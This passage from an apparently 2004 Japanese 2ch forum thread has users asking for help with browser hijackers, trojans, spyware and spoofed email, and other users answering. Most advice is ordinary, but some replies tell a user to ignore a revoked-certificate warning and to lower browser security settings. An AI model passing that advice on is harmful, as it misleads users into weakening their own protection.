ちなみに、Fromに惑わされちゃ駄目だそ。詐称可能なんだから。

732 :名無しさん@お腹いっぱい。:04/05/22 22:23
>>726
バスターかノートン。
でもノートンインターネットセキュリティの評判はすこぶる悪い。ノートンアンチウイルスは悪くない。
糞ースは全然メジャーじゃない。しばらく前まで扱っていたMCAFEE(これは老舗)に切られて、
あやしげな開発元からひっぱてきたもの。騙されないように。

733 :名無しさん@お腹いっぱい。:04/05/22 22:30
>>731
あー言われてみればそうかもしれんね。業者が自分自身にメールしてBCCに不特定多数のアドレスを
入れてるかもしれんね。受け取った不特定多数の人は自分以外に何人に送ったか分からないし。
しかし、ヘッダを見てもBCCって書いてないし。どこを見ればBCCで送られてきたか分かるんだ?

734 :初心者:04/05/22 23:12
どこに書き込めばいいのかわからないのでココに書き込みさせて
下さい><すみません。

今日某掲示板で安易にurlをクリックしたところ
エロサイトらしきものにつながって「ウィルスに感染しました」
と警告がでました。そしてスキャンしたのですがウィルスは
発見されませんでしたとでました。

ホームがエロサイトになってしまったのですがそれは
自力で直しました。
ですが普通のurl(例えばヤフーの「占い」を押したのに
エロサイトにとんでしまう)なのにエロサイトに飛んでしまいます><

どうやって直せばいいのでしょうか?
初心者なのでわかりません。どなたか教えて下さいよろしくお願いします。

735 :名無しさん@お腹いっぱい。:04/05/22 23:14
「POINT32.exeがネットにアクセスしようとしています」
っていうのは許可しても安全でしょうか?

736 :688:04/05/22 23:19
 昨夜お世話になったものです。
問題はほぼ解決したようです。
 僕も今回の一件で自分の普段からの、
防犯意識の欠如を痛感しました。
 みなさんを始め、さらに自分のHPまで作って日々
無償で助言を下さる方々は、本当にすごいと思います。
 みなさんと出会えたおかげで、僕も困っている
人を何の見返りも考えずに、助けられる人間に
なりたいと思えるようになりました。

 長くなってすみません、本当にありがとうございました。







737 :名無しさん@お腹いっぱい。:04/05/22 23:38
>>734
ツール→インターネットオプション→履歴、Cookie削除

738 :名無しさん@お腹いっぱい。:04/05/22 23:58
>>735
MSのIntellimouse monitorだべ。あまり気にすんな。適当に止めとけ。

>>736
いえいえ。 (`・ω・´)

739 :名無しさん@お腹いっぱい。:04/05/23 00:01
>>736
お疲れチャン。いい奴だな。

>>733
>どこを見ればBCCで送られてきたか分かるんだ?
To:かCc:に自分のアドレスがない事で判る。

740 :738:04/05/23 00:05
む。微妙に書き方悪かったか。
しつこく通信しに行くならブロックルール作って 適当に止めとけ って意味な。>MSのIntellimouse monitor
常駐まで切ると拡張機能などが効かなくなるよん。>POINT32.exe


741 :名無しさん@お腹いっぱい。:04/05/23 00:52
私も久しぶりに某画像貼り付け掲示板に行ってみたら
どうもウイルスを含んだ画像が貼られていたのか、特に何も画像を落としたわけでもないのに
ウイルスバスター2004に12ヶのウイルスが確認されたと警告が出ました。

加えて最初にカジノのホームページに接続されたり
ヤフーなどのニュースのリンクを押すと、アダルトサイト(リンク切れ)に飛んだり
数分おきにウイルスが検出されたり
数分おきに変態サイト(リンク切れ)のHPが立ち上がったり・・・
何よりも困っているのが、対処方法を検索しても、大部分がそのアダルトサイトに飛んでしまったり
反応しなかったりで、対策さえ分からない状況です。
(ちなみに今、ギコナビで書いてます。ギコナビは通常に動く・・・何故?)

感染後行ったのは以下の通り
1.ウイルスバスターを手動検索
2.スパイウエアの検索
3.ウイルスを可能な限り隔離
4.システムを1ヶ月前に復元
5.テンポラリーファイル全て削除
6.クッキーも削除
7.IEを最新版にアップデート
続きます



742 :名無しさん@お腹いっぱい。:04/05/23 00:55
続き
大部分がウイルスバスターによって隔離されていましたが、二つほど隔離できなかったものがありまして
バスターのウイルスログを見ると

●JAVA_BYTEVER.A
 GetAccess.class (C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\HSGR9LW1\classload[1].jar
●TROJ_ISTBAR.DW
 istactivex.dll (C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\E7632DQ3\0006[1].cab)

の2種類が隔離できていないようです。そこで、トレンドのホームページで対処法を見たら「ファイルを削除」とありましたので
ドライブ内を見たのですが、それらしきファイルが無いんです・・・。

また、システムの復元を試したのですが、ほとんど変わらず、
IEを最新バージョンに変更したのですが、改善されないどころか、反応が遅くなったりしてます。
(ちなみに現在トレンドにも繋がらなくなりました・・・)

申し訳ありません!誰か助けてください。

743 :名無しさん@お腹いっぱい。:04/05/23 00:57
Backdoor.OptixPro.13 に感染しました。

ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.optixpro.13.html
 ↑
ここ見て書いてある手順通りに駆除を実行したんだけど
それだけでいいのかな?
他にもこうしなきゃいけないとか、やっておいたほうがいい事が
もしあったら教えてください。

744 :名無しさん@お腹いっぱい。:04/05/23 01:12
>>741-742
文章が長い割にはOSが書いてないな。
IEのキャッシュは普通には見られない。
IEの[ツール] [インターネットオプション]で、「ファイルの削除」を押せ。
それ以外にも何かいそうだけど。

745 :名無しさん@お腹いっぱい。:04/05/23 01:48
741-742です

OSはXP ホームエディション

追加ですが、数分おきに検索にひっかっかるのは
TROJ BUDDYLINK.A (rs.exe)ともう一つ同じトロイ型。
どちらもウイルスバスターで自動で隔離されるのですが、数分おきなのでウザイ。
これも削除できないです。

>>744さま
 やってみたのですが、変化ありません。

ついに、文字のコピー貼り付けが出来なくなりました。

746 :名無しさん@お腹いっぱい。:04/05/23 01:58
>>745
数分おきに自動隔離って事は、数分おきに“何か”を貰ってきちゃってるんじゃないか?
コピペまで出来ないって、もう再インストールしかないだろ。
再インストールしたら、キチンとゴム付けてから繋ぐんだぞ。

747 :名無しさん@お腹いっぱい。:04/05/23 05:05
どこで聞いていいかわからず
スレ違いだったらごめんなさい。

ノートンで隔離されてその後削除したものって、
もとには戻せないのですか?
いえ、大事なものを削除してしまったわけではなく
「いつウイルスをもらった」っていう事実だけが
知りたいのですが・・・

748 :名無しさん@お腹いっぱい。:04/05/23 06:09
>>747
AntiVirusの レポート→活動ログ→脅威警告 から見られる。

749 :747:04/05/23 06:59
>>748
いや、それがですね、LOGを全部削除されてるんですよ。
だからどうにかしてそれを見れるような方法がないかと思って・・・。

無理ですかね?

750 :名無しさん@お腹いっぱい。:04/05/23 07:18
NECインターチャネルのV3ウィルスブロック体験版、なるものをインストールした後、
Ad-awareとその日本語化パッチなどをダウンロードしようとするとなぜか
全て99%で止まってしまいます。
体験版自体を削除しても直りません。
どうすればいいでしょう…
OSはXP Proです。
PCを新しくしたばかりなのですが、今まで使っていたウィルスバスターの更新時期
でもあり乗り換えを検討していた矢先なのでとても困っています。
他のウィルスソフトは入れていません。

751 :名無しさん@お腹いっぱい。:04/05/23 07:44
昨日ダウソ板をクリクしてみてたらなんか急にノートン先生が反応して
ウイルスかかったんだけど・・


752 :734:04/05/23 09:22
>>737
折角教えて頂いてその操作をしたのに直りませんでした;;
普通のurlなのにクリックするとエロサイトが何個も開かれます><

他に方法はないでしょうか?


753 :名無しさん@お腹いっぱい。:04/05/23 09:55
問題が発生したためiexplore.exeを終了します。
と出るんですがこれはどうしたらいいんですか?


754 :734:04/05/23 09:59
ttp://www.sexocean.biz/in
上のページを開いたらそうなりまいした・・・
検索したらスパイウェアっぽいです;
ファイルの削除など全てやりましたができません><

ttp://www.sexocean.biz/inのurlが混ざったままです;


755 :名無しさん@お腹いっぱい。:04/05/23 10:15
>>754
↓ここのテンプレやまとめサイトを全て実行

エロサイト見てたら…助けてください!part24
http://pc5.2ch.net/test/read.cgi/pcqa/1084800180/

それでも治らなければ質問する


756 :名無しさん@お腹いっぱい。:04/05/23 10:46
>>753
OSの名前とIEのバージョンは?
…と訊くまでもなく、それはウイルスとは関係なく、日常的によくある事だ。
気にスンナ。

757 :名無しさん@お腹いっぱい。:04/05/23 12:33
社内のコピー機なんだけど
LANで繋がってる場合
コピーしたもの(データ)が社内サーバーにも
記録されてると聞いたけどそうなの?

758 :名無しさん@お腹いっぱい。:04/05/23 12:52
>>757
そうなるように設定してたらそうなる

759 :名無しさん@お腹いっぱい。:04/05/23 12:56
>>757
なんかシャープのコピー機のCMみたいだな。
全部を保持しておくとして、どれだけの容量が必要だと思う?
しかも、コピーって事は文字情報じゃなく画像情報で。
原理的に不可能じゃないかもしれないけど、はっきり言って杞憂だと思う。

760 :名無しさん@お腹いっぱい。:04/05/23 12:57
>>757
そいう設定ができるコピー機でそういう設定にしてあれば
そうできるw。しかし無差別に記録していたら媒体はDVD
使うにしても鯖の処理能力をけっこう食うだろうな。マル秘
のウォーターマークを発見すると記録するとか、そういう
仕掛けならアリかも。

761 :名無しさん@お腹いっぱい。:04/05/23 13:05
社内のネットワークは
管理者が管理してるから
それから抜けるのは無理ですよね〜
何か良い方法はありますか?

762 :名無しさん@お腹いっぱい。:04/05/23 13:10
>>761
有るけど教えない。

763 :名無しさん@お腹いっぱい。:04/05/23 13:16
>>759
>>760
設定してあるかどうかどこでみたらいいの?
とにかくあやしい。
一枚コピーとるのにやたら時間かかるときあるし
バックは毎日毎日延々ととってるみたいです。
普通はLANなんて繋いでないものなの?

764 : :04/05/23 13:27
IPFWで弾いたIPは
nslookupで引けなくなるのですか?

引けなくなっているのがあるのですが
教えてください

765 :764:04/05/23 13:29
add deny all from 211.4.194.*** to any
こんな感じで弾きました ***は伏せてあります

766 :名無しさん@お腹いっぱい。:04/05/23 13:30
>>763
> 設定してあるかどうかどこでみたらいいの?
パネル弄りゃそういうメニューがある。マニュアル入手すれば手っ取り早い。
パスクラックはアク禁法の処罰対象になるから気をつけろ。

> 普通はLANなんて繋いでないものなの?
ふつーは複合機でプリンター(やスキャナー)としても使うからLANにはつなぐ。

767 :名無しさん@お腹いっぱい。:04/05/23 13:35
>>764-765
ログ読みゃいいだろ。ログも読めない奴は市販のBBルータ使ってろ。

768 :名無しさん@お腹いっぱい。:04/05/23 13:35
>>763
>一枚コピーとるのにやたら時間かかるときあるし
ソーターやら用紙カートリッジやらの選択で、物理的に稼動する場合には
時間が掛かる事もある。
>バックは毎日毎日延々ととってるみたいです。
バックアップ(バックって略すな)は毎日する物なんだよ。
データがスッ飛んで「1ヶ月前のバックアップしかありませんでした」じゃ困るだろ。
>普通はLANなんて繋いでないものなの?
プリンタ兼用機なら、LAN経由でプリントアウトするのに必要。

試しに、同僚や上司やネットワーク管理者に「とにかくあやしい」って言ってみれば?
笑われるだけだから。
それでも食い下がれば、いい病院を紹介してもらえるよ。

769 :名無しさん@お腹いっぱい。:04/05/23 13:37


770 :名無しさん@お腹いっぱい。:04/05/23 15:53
お前はそんなに見られて困るものをコピーしてるかw

771 :名無しさん@お腹いっぱい。:04/05/23 16:29
セキュリティー全般自分のパソコンの安全対策や
ネット犯罪など知ってた方がいいだろうってことは
どこで勉強すればいいんですか?

772 :名無しさん@お腹いっぱい。:04/05/23 16:46
763のコピー内容がとにかくあやしい。

773 :名無しさん@お腹いっぱい。:04/05/23 16:49
>>771
お前、家庭料理と司法試験対策と運転免許受験対策はどこで勉強すれば良いですか?
と聞かれたら困ると思わないか?

774 :名無しさん@お腹いっぱい。:04/05/23 17:08
>>771
本屋行ってそれっぽい本買って読めばいいんでないか?

775 :名無しさん@お腹いっぱい。:04/05/23 17:27
>771
この板に立ってるスレッドをかたっぱしから読んでみてはどうだろう。
要らない知識も入ってきそうだけど。

776 :名無しさん@お腹いっぱい。:04/05/23 18:32
>>771
前はちょうどいいのがなかなかなかったんだよな。

まず、基礎知識を身に付けるという点では、
http://www.cyberpolice.go.jp/
の、「キッズ」のとなりの「パソコンユーザー」あたりか?

あと、プロバイダーや、PCメーカーによっては、サポートのところに書いてある
ところもあるから、自分のところのを探してみる。

ニフのなんか、解りやすくまとまっているような気もする。
Niftyのトップから「ウイルス対策」へ入ると、セキュリティ@niftyのサイト。
ウイルス対策だけでなく、セキュリティ全般について出ている。
http://www.nifty.com/webapp/security/index.jsp
全部読んだわけじゃないけど、結構充実してるね。知らんかった。
ソネ、BIGは物足りない。あ、オレはニフユーザーじゃあないけど。
他のプロバでもいいところがあるかな。

後、セキュリティ関連ニュースを読んで新しい情報をチェックすればよいんでない?
http://www.rbbtoday.com/news/security/
http://www.itmedia.co.jp/enterprise/security/
トレンド、シマンテックなど。
自分が分かりやすいと思ったところを読んでみれば?


777 :771:04/05/23 18:41
>>773-776
みなさん、ありがとうございます!
まず776さんの這ってくれたサイトを読んでみようと思います。
本やここも読んでみたいと思います。参考になりました!

778 :名無しさん@お腹いっぱい。:04/05/23 18:44
おすすめのトロイ検出ソフトをおしえてください

779 :名無しさん@お腹いっぱい。:04/05/23 19:19
>>778
a scuared 2 
ttp://www.emsisoft.com/en/

ewido security suite
ttp://www.ewido.net/de/?section=downloads

関連スレ
http://pc5.2ch.net/test/read.cgi/sec/1052242064/

780 :名無しさん@お腹いっぱい。:04/05/23 19:40
>>776
思わず@policeのアニメに見入ってしまった(w

781 :778:04/05/23 19:41
>>779
どうもありがとうございました

782 :778:04/05/23 19:47
あっ、それともう一つだけ質問させてください。
おねがいいたします。
トロイ検出ソフトを使わずに、シマンテックや、トレンドマイクロの
ウィルス、トロイスキャンだけでは駄目でしょうか?

783 :名無しさん@お腹いっぱい。:04/05/23 19:51
>>782
両者で検出されなかったものがa2で検出された経験あり

784 :778:04/05/23 20:11
>>783
本当ですか、いろいろありがとうございましたっ

785 :名無しさん@お腹いっぱい。:04/05/23 22:04
>>768
いろいろ教えて頂きありがとございました。
変なものをコピーしてるのでなく
あまりにセキュリティがズサンなので困ってます。
管理者はメールや、社内の重要な文書、各端末のログなど(ネットの)
一日見て喜んでるのでイヤなんです。
ここだと詳しいかたたくさんおられると思ったので・・・


786 :名無しさん@お腹いっぱい。:04/05/23 22:32
管理者本人による人的問題か。

787 :名無しさん@お腹いっぱい。:04/05/23 22:42
さっきファ板でオタクファッション発見みたいなのを開いたら
ロリータBBSみたいなのに飛ばされました。
で、パソコンが重くなったんで再起動して
またインターネットのブラウザを開くと、アメリカのエロページに
飛ばされるようになりました。
こういう事は前にもあったので、コントロールパネルから
インターネットオプションの標準ページをYAHOOにしました。
しかしまたブラウザを開くとエロページに飛ばされてしまいます。
しかもインターネットをしていて少したつと
何もして無いのに変なブラウザが開かれ全画面表示になったりします。
これは何故なんでしょうか?
一応スパイウェアソフトは使って、スパイウェアは削除したんですが。
長文ですが誰か答えてください。

788 :名無しさん@お腹いっぱい。:04/05/23 22:45
>>787
ソフトのアップデートはしたかね。

789 :名無しさん@お腹いっぱい。:04/05/23 22:49
>>787
なんてページに飛ばされんの?

790 :名無しさん@お腹いっぱい。:04/05/23 22:55
>>787
エロイページに自動でとばされるなんてうらやましいな。





かあちゃん、勝手にとばされるんやわ、ホンマやわいな

791 :名無しさん@お腹いっぱい。:04/05/23 23:17
>>787
AD-awareの最新版です。

>>789
school fuck!というページです。

792 :名無しさん@お腹いっぱい。:04/05/23 23:26
>>791
最新版だろうとアップデートはしてみれ。
それでもだめならセーフモードで試してみれ。

793 :名無しさん@お腹いっぱい。:04/05/23 23:35
会社でセキュリティソフトを買ってくるように言われ、
ノートンのインターネットセキュリティ2004特別優待版というのを買ってきたのですが、
もしかしてこれ、初めて導入するセキュリティソフトとしては使えないんじゃ・・・。
誰か教えてください。

794 :名無しさん@お腹いっぱい。:04/05/23 23:41
>>793
元から他社のウィルスソフトが入ってたり
シマンテックのソフトが入ってたらOKじゃなかったか。

795 :名無しさん@お腹いっぱい。:04/05/23 23:53
パソコンやられて携帯からです。 急に英語ばかりのウインドウがひらいて IPアドレスが書いてありました。 何かの警告だと思うのですが、ウィルスか不正アクセスか何なのかわかりません。

796 :名無しさん@お腹いっぱい。:04/05/23 23:54
パソコンやられて携帯からです。 急に英語ばかりのウインドウがひらいて IPアドレスが書いてありました。 何かの警告だと思うのですが、ウィルスか不正アクセスか何なのかわかりません。

797 :名無しさん@お腹いっぱい。:04/05/23 23:59
>>794
いや、何にも入ってないんです・・・。

798 :名無しさん@お腹いっぱい。:04/05/24 00:00
>>796
それだけの情報でどうしろと・・。

799 :名無しさん@お腹いっぱい。:04/05/24 00:04
英語ばかりのって…。肝心の内容を知らせろよ。

800 :名無しさん@お腹いっぱい。:04/05/24 00:05
>>797
まぁ、使えると思われ。

801 :名無しさん@お腹いっぱい。:04/05/24 00:11
すみません 長いとエラーがでてしまって… 覚えているのが、 spyware〜…なんとかかんとか ipアドレス(覚えていません)、on、your、pc そして何かの無料ダウンロードを紹介する画面に行き、 そこの一つをDLして調べるといくつか検出しました。

802 :名無しさん@お腹いっぱい。:04/05/24 00:14
>>801
長いとエラーが出る???
意味わからんがスパイウェア対策ソフトは試したかね。
あと怪しいと思ったらウィルススキャンしてから聞こうね。

803 :名無しさん@お腹いっぱい。:04/05/24 00:21
ウィルススキャンでは何も出ませんでした。spywareなんとかという無料でDLできる中の一つで調べるといくつか検出しました。 でも削除には名前が必要みたいで… これは製品を買わないといけないんでしょうね

804 :名無しさん@お腹いっぱい。:04/05/24 00:26
>>803
(°Д°)ハァ?

805 :名無しさん@お腹いっぱい。:04/05/24 00:29
すみませんでした! 携帯からだと上手く伝えられないので、 セットアップしなおします。 失礼しました

806 :名無しさん@お腹いっぱい。:04/05/24 00:30
>>803
そんな勝手に紹介されるページでダウンロードすんなよ。
Ad-awareかスパイボット使え。

807 :名無しさん@お腹いっぱい。:04/05/24 00:37
すみません、質問です。

ここ5日ほど、同じCATVのIPからポート139をやたら探ってきます。
今のところ、6箇所のIPからです。
田舎のCATVなのでライトユーザーも多く、トロイとかは蔓延しやすいので気になってます。
(実際にスラマーなんか凄かったし、未だにきます)
先週ぐらいから、ポート139を叩いてくるようなトロイってありましたっけ?

一応ブロックも出来てるので、実害は無いのですが・・・

808 :名無しさん@お腹いっぱい。:04/05/24 00:42
PCを開いている間ずっと画面の右上に
「web search」
というモノが出ているのですが
どうすれば消すことができるのでしょうか?
どなたか教えてください、お願いします。



809 :名無しさん@お腹いっぱい。:04/05/24 01:07
パソの電源を切れば・・・・

810 :名無しさん@お腹いっぱい。:04/05/24 01:15
>>809
切っても付けるとまた
出てきます。
誰か助けてください。

811 :名無しさん@お腹いっぱい。:04/05/24 01:55
>>810
怖がる前に調べることをお奨めします。
チミの気持ちよりも、詳しい状況を書かないと質問にはなりません。(>>1にも書いてあります)
変なサイトに行ったとか、どこかにいったら変な画面がでできてクリックしてしまったとかないですか?
バーをアンインストールするか、
「Spybot」[Ad-aware]などのスパイウェア駆除ソフトを使ってスキャンしてみてください。



812 :名無しさん@お腹いっぱい。:04/05/24 09:47
質問です。
掲示板で変なURLを踏んでしまってウイルスだらけのサイトに
飛ばされてしまい、その時はウイルスソフトが防いでくれたと思ったのですが
それ以来、IE(version6sp1)を開くとschool-fuck.com/と言う
アダルトサイトがHomeで上がってしまうようになり、
インターネットツールを使っても治りません。
どうもres://C:\WINDOWS\System32\shdoclc.dll/dnserror.htmと
出てくるので強制的にhomeをshdocle.dllと云うところを参照するように
設定されてしまっているようです。
マイクロソフトのWINDOSアップデイトで更新しようとしても
途中で止まってしまい完了できず、なにかアプリケーションの動作も
非常に重くなってしまいました。
この状態を回復する方法はありますか?
OS自体を再インストールするしかないんでしょうか・・・?

813 :名無しさん@お腹いっぱい。:04/05/24 10:30
>>812
IEのプロパティの全般タブのホームページのアドレス変えてもダメ?

814 :名無しさん@お腹いっぱい。:04/05/24 11:23
>>812
エロサイト見てたら…助けてください!part24
http://pc5.2ch.net/test/read.cgi/pcqa/1084800180/

815 :名無しさん@お腹いっぱい。:04/05/24 17:33
病院の診察紛失したんですけど診察カードって悪用されますか?

816 :名無しさん@お腹いっぱい。:04/05/24 18:27
>>815
その診察券にもよる。
物によっては生年月日が入ってるから、キャッシュカード込みで紛失してて、
たまたま暗証番号が生年月日だったりするとアウト。
診察券程度じゃID足り得ないから、それでお金を借りる等の被害はないでしょ。
…ってゆーか、ここは“パソコンの”セキュリティに関する話をする場なのでは?

817 :名無しさん@お腹いっぱい。:04/05/24 18:38
>>816 すみません間違えました。誘導してもらえたら幸いです

818 :名無しさん@お腹いっぱい。:04/05/24 19:09
生活板じゃないかと思うが、自分で調べてくれ。

819 :名無しさん@お腹いっぱい。:04/05/24 19:25
デジタル家電 健康器具 防犯グッズなどを激安で扱っております

http://yuzer8.cool.ne.jp/buy/suzuya.htm

マニアックなお客様にもご満足頂けるショップを目指す所存に
ございますので以後ご指導ご鞭撻のほど宜しくおねがいたします

820 :名無しさん@お腹いっぱい。:04/05/24 20:15
2ちゃんねるでよく貼られてるvbsのウイルスがウザイんで
ノートンでログフォルダを除外してるのにウイルスが検出されます。
どうしたらいいでしょうか?Nortonantivirus2004です。

821 :名無しさん@お腹いっぱい。:04/05/24 20:45
オフィスヒラ○ワのその後はどうなったんでしょうか?

822 :名無しさん@お腹いっぱい。:04/05/24 20:52
ぽすけて、の所だっけ。俺も知りたい。

823 :名無しさん@お腹いっぱい。:04/05/24 20:53
>>819
折り畳み警棒は日本製はやめとけ。物を叩くと縮まなくなるぞ。
やはりASPがいい。

824 :名無しさん@お腹いっぱい。:04/05/24 21:29
ネットに接続するとものすごく重くなって、
全然機能しません。今も、ものすごく重いです。
送信の量がどんどん増えてとまりません。
逆に受信の量はほとんど増えず。
調子のいいときは送信、受信同じくらいなのですが・・。

ゾーンアラームを入れると、それでもかなり重いですが、なんとか
ネットを見ることができます。

ノートンなんですが、起動させても、すぐ切れてしまいます。

再インスコしかないかな・・


825 :名無しさん@お腹いっぱい。:04/05/24 21:33
>>824
ウイルスチェックとスパイウェアのチェックをしろ。何かいそうだ。
ソフトに頼らず解決する力がないのなら、金出して買っとけ。

826 :名無しさん@お腹いっぱい。:04/05/24 22:44
ネットしてたらリンク開いた瞬間なんかでっかいバナーみたいなのが出てくるんです。プロパティ開くと
画像ファイルなのにリンクが付いてて HyperText 転送プロトコル (HTTP)って書いてあるんですけど…。
何なんでしょうか?

827 :>>826:04/05/24 22:50
adview.php?what=zone:1&n=acc8a1dc

プロトコル: HyperText 転送プロトコル (HTTP)

種類: 使用不可

アドレス: http://engine.adservs.com/adview.php?what=zone:1&n=acc8a1dc
(URL)

サイズ: 使用不可

大きさ: 600 × 400 ピクセル

作成日: 使用不可

更新日: 使用不可

これがプロパティの内容



828 :ご存じの方!:04/05/24 22:55
ウィルスっぽい症状で困っています。
自宅のWinXpHomeEditionノートのキー配列が不正になっています。
例えば、Hを押すと数字の5、Iを押すと数字の6が入力されるといった感じです。
FFXIのアップデートが数時間かかりそうだったので、アップデートしっぱなしで外出し、
戻ってきたらこうなっていました。Norトンのファイアウォールはオフっていました。
そして、アンチウィルスで検索してもウィルスは見つかりません。

「ウィルス キー配置 症状 対策」などでぐぐったのですが、良いページが見つかりません。
以下の2点について、ご存じの方、リンクを貼り付けて下さるだけで結構ですので、
教えて下さい。よろしくお願いします。
1)キー配置を元に戻す方法
2)このウィルスに関する情報

ネタじゃなくて本当に困ってます。どうぞよろしくお願いします。

829 :名無しさん@お腹いっぱい。:04/05/24 23:01
>>828
ウィルススキャンで出てこないならウィルスいないね。
というか、numlock されてるだけじゃんwもう一回おすべし。

830 :ご存じの方!:04/05/24 23:11
いやー最大限に恥ずかしさが高まった感がします。
ななんと、NumLockで解決しました〜〜〜〜!
ウィルスではないのですから、ぐぐってもでてこないわけですね。
前も同じ状況になってOSから入れ直しました(;´∀`)
なぜSpybotsもAVGーAntiVirusもいれて、なおかつNorton先生までいるのに
って思ってましたが、これで納得です。
名無しさん@おなかいっぱいさん、ありがとうございました(´∀`)/


831 :812:04/05/24 23:59
>>814
誘導して頂いたスレの、システムツール>システムの復元で
トラブル前の状態へ回復できました!ありがとうございます。

>>813
一旦標準設定のHOMEに戻るんですが、もう一度IEを立ち上げると
またその変なサイトがTOPになっているんですよ。あれは焦りました・・・。
どういう状態だったんだろう?

832 :名無しさん@お腹いっぱい。:04/05/25 00:21
>>831
スパイウェア(ブラウザハイジャッカー)に感染してたんだろね。
変なサイトに行って勝手にDLされたのかもしれない。

833 :名無しさん@お腹いっぱい。:04/05/25 00:28
宝塚記念のファン投票しようと思って
http://www.jra.go.jp/fan04t/fanent_index.htmlの投稿フォームにいこうとしたら

セキュリティの警告
このサイトのセキュリティ証明書は、取り消されています。
このサイトを信頼すべきではありません。

と、表示されて投稿フォームにいけません

どうすれば投票できるようになりますか?

834 :名無しさん@お腹いっぱい。:04/05/25 00:33
>>833
気にしないで投票すれば? JRAだし。(へー、go.jpなのか)
話は違うかもしれないけど、市販の周辺機器には
マイクロソフトの署名がないドライバを入れる物もあるんだけど、
そういうのも嫌なクチ?

835 :名無しさん@お腹いっぱい。:04/05/25 00:37
ああ、どうすればそこへ行けるか、か。
インターネットオプション→セキュリティ→レベルのカスタマイズ、でどう?

836 :名無しさん@お腹いっぱい。:04/05/25 00:43
ADSLで、市販のセキュリティソフトを使用し、ルーターを介してネットに接続しています。
ルーターには複数台のPCが接続されています(家族が使用)。
この状態で第3者のPCで、どのPCからどこのサイトにどんなデータが行き来しているかわかるものなのでしょうか?
あるとすれば、どのような例があるのか知りたいです。極端なものでもかまいません。よろしくお願いします。




837 :833:04/05/25 00:44
>>835
全部低にしても同じダイアログでいけないんです

838 :名無しさん@お腹いっぱい。:04/05/25 00:47
netsky 系のウィルスを無料で駆除してくれるサイトというか
トライアルのあるところって存在しますか?

839 :名無しさん@お腹いっぱい。:04/05/25 00:59
やや曖昧な質問内容で申し訳ありませんが、
最近、私のパソコンがウィルスにやられまして。
それでかはわからないのですが、どうもネットに
繋いでいる際に、ブラウザの右下部分に違和感を
感じるのです。確か以前ならば「インターネット」と
表示されていただけの部分が、最近は、「インター
ネット(混在)」と表示されているのです。これは、
もしかしてまずいことになっているのでしょうか?

*非常に曖昧かつ、要領を得ない質問で申し訳あり
ません。

840 :名無しさん@お腹いっぱい。:04/05/25 01:14
>>838
聞く前に調べたか?
ググればすぐ見つかる。

841 :名無しさん@お腹いっぱい。:04/05/25 01:15
19日頃、NIS2002で警告出っぱなしだたみなさん、現在はどーですか。
ちなみに漏れは昨日くらいからパッタリ止みますた。何か不気味です。
2004を買おうか迷うところです。

842 :名無しさん@お腹いっぱい。:04/05/25 01:24
>>839
とりあえずテンプレ嫁。
怪しいと思ったらスキャンをしろ。
それから質問しませう。

>>841
↓で調べてみたらどうか。
Norton InternetSecuroty 2002 不具合対策本部
http://pc5.2ch.net/test/read.cgi/sec/1085084064/

843 :名無しさん@お腹いっぱい。:04/05/25 01:25
メールで件名に、Mail Delivery(failure xxxx@xxx)
(↑カッコ部にウチのメールアドレスが記述してあった)
のが来たのですが、これって開いても大丈夫ですか?
それともやばいですか?


844 :名無しさん@お腹いっぱい。:04/05/25 01:28
>>843
【正式】ウィルス情報&質問 総合スレッド☆Part19
http://pc5.2ch.net/test/read.cgi/sec/1083586576/
の754以降。

845 :名無しさん@お腹いっぱい。:04/05/25 01:34
>>843
つーかね、怪しいと思ったら開くな。すぐ捨てろ。
怪しいと思ったらスキャンくらいしろ。
そんぐらいわかるだろーが。

846 :名無しさん@お腹いっぱい。:04/05/25 01:38
>>844
ありがとです

847 :名無しさん@お腹いっぱい。:04/05/25 02:14
今日いきなり見知らぬ人から、私のデスクトップにある全てのファイル・ショートカットをまとめて圧縮で送られてきたんだけど、
これなあに?

848 :名無しさん@お腹いっぱい。:04/05/25 02:17
>>847
説教泥棒みたいな奴かね。
ちみのセキュリティは大丈夫かい?

849 :名無しさん@お腹いっぱい。:04/05/25 02:29
>>848
ノートンインターネットセキュリティ入れてます。
もちおrん、winnyとかやってません。
ほんとに気味悪いです。

850 :名無しさん@お腹いっぱい。:04/05/25 02:37
>>847見たいに不正アクセスされた場合、どうやったらわかるの?
FWのログにのこる?


851 :名無しさん@お腹いっぱい。:04/05/25 02:41
キンタマウィルスみたいだな。

852 :名無しさん@お腹いっぱい。:04/05/25 03:05
メールの本文が
------------------------
ttp://www.zastar.com/pc/
------------------------
できたんだけど、なんだろこれ。

853 :833:04/05/25 03:39
MeでAd-aware 6.0・Spybot・spywareblaster・Outpost・AVG 6.0入れてます

854 :名無しさん@お腹いっぱい。:04/05/25 06:36
スレを開いたら、ユーザーアカウントみたいなのが開いたんです、そこの、名前(?)を入れる欄に、
ネットワーク接続する時のパスワードがなぜか出ちゃったんです。
これってどういう事なんでしょうか?

ちなみにここなんです
++++++ 美人・普通・ブス の顔画像サンプル ++++++
http://love3.2ch.net/test/read.cgi/sfe/1080093412/

855 :名無しさん@お腹いっぱい。:04/05/25 08:12
会社のパソコンでマカフィーをインストールしようとしたら、
「お使いのOSは対応外です」というメッセージが出て、インストールできません。
ちなみに使ってるOSは「Windows2000Server」です。
「Windows2000Server」に対応しているセキュリティソフトってありますか?

856 :初心者:04/05/25 09:19
ノートンインターネットセキュリティーをXPで使用してるのですが
ネットに繋がってるんですがホームページが見れません。
ファイアウォールの設定を変更すれば見れるのですが、電源を落としたり再起動
すると設定が元に戻ってるみたいでまた見れなくなってしまいます。
変更した設定を保存する方法ってどうするのでしょうか?
ちなみに回線はFTTHです。

857 :名無しさん@お腹いっぱい。:04/05/25 09:25
>>854
「みたいなの」とか「(?)」でどう判断しろと?
恐らくネットワーク接続が不安定で、一旦切れて、接続ダイアログがまた出ただけじゃねーの?

858 :aho@aho:04/05/25 10:40
知らないとこから
”ウイルスおくってくるな。ゴルア”
とクレームつけられたと知人から相談うけた。
それって知人はFrom欄詐称されただけの可能性高いんだけど
世の中いきなり文句つけてくる人もいるんだな。
どう対応したらいんだべ

859 :名無しさん@お腹いっぱい。:04/05/25 10:45
>>858
プロバイダに相談してみたら?

860 :名無しさん@お腹いっぱい。:04/05/25 10:49
>>858
そういう場合は、相手がアドレス詐称を知らない無知な人なんだ、と思ってスルー。
それとも根気よく相手に教えて勉強させる?

861 :名無しさん@お腹いっぱい。:04/05/25 14:23
ttp://naonao.ddo.jp/
